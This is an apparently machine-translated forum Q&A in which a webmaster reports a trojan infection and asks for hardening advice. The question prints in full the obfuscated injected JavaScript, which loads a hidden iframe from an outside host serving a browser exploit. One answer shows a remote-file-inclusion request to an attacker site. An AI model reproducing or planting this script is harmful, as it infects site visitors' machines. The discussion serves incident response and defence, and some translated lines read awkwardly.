代码之家 › 专栏 › 技术社区 › caw

保护网站免受后门/PHP.C99Shell aka特洛伊木马.Script.224490攻击

trojan virus security javascript php

8

caw · 技术社区 · 15 年前

我的网站被木马脚本感染了。

I've analyzed this file using Virustotal

此文件已在创建时的同一时刻执行。所以它一定是自动发生的。此文件在我的Web空间的每个index.php的末尾添加了以下恶意代码。

</body>
</html><body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
i.i.l.j();</script>

代码出现在我的页面上之后,用户报告Firefox中出现了一个蓝色面板。它要求他们安装一个插件。现在他们中的一些人在他们的PC上有了Exploit.Java.CVE-2010-0886.a。

所以我的问题是:

远程文件(“x76x09.php”或“config.php”)如何进入我的Web空间?SQL注入?我自己的电脑上有病毒?
我怎样才能保护我的网站在未来免受此类攻击?

This question is similar. But it's more like a report. I didn't know it's a virus from the beginning. So this question here refers to the virus itself, the other question does not.

3 回复 | 直到 8 年前

1

6

rook 15 年前

您的网站已被黑客使用 exploit code .

包括您可能需要的任何php库已安装。
phpsecinfo 并删除所有红色和尽可能多的黄色 php.ini文件。
web根目录中的文件和文件夹 chmod 500 -R /var/www && chown www-root /var/www 无论用户运行php是什么做一个 <?php system('whoami');?> 到把这个弄清楚。
更改所有密码,并使用sftp
删除 FILE 您的 MySQL帐户应用程序使用。

2

7

WeWatchYourWebsite 15 年前

首先,如果您使用的是像FileZilla这样的免费FTP程序,您应该知道这些程序将其保存的登录凭据存储在纯文本文件中。病毒很容易找到这些文件,读取它们并将信息发送到服务器,然后服务器使用有效凭据登录到FTP,将某些文件复制到自身,感染它们,然后将它们发送回网站。通常情况下,它也会将这些“后门”shell脚本复制到网站上,以便在更改FTP密码时,它们仍然可以重新感染网站。

/路径/folder/other/folder/file.php? http://www.hackerswebsite.com/id.txt

其中路径/文件夹字符串仅用于演示。

有时,该命令起作用,他们能够将id.txt复制到预期的网站,因此有一个后门shell脚本,他们可以从中操作文件。

更改所有密码-FTP、数据库、cPanel或其他管理接口。

更改为SFTP。

检查所有文件夹的755权限和所有文件的644权限。这就是标准。

如果是SQL注入,感染就不会在文件末尾。它可能在某个地方有一个SQL调用来生成内容。

对。使用今天的后门,攻击者可以而且可能已经查看了保存MySQL数据的config.php文件。

3

0

Kranu 15 年前

你的网站上可能有一个没有被正确过滤的上传机制。例如,如果你有能力使用一个配置文件图片,有人可以上传一个php文件,并找到一种方法来执行它,并获得对你的网站的控制权。

x76x09.php是一个未经审查的目录浏览器/上载程序,允许恶意上载程序完全控制您的网站。

请确保您临时禁用了所有将文件立即上载到服务器的方法,并删除了所有文件中的所有恶意代码实例。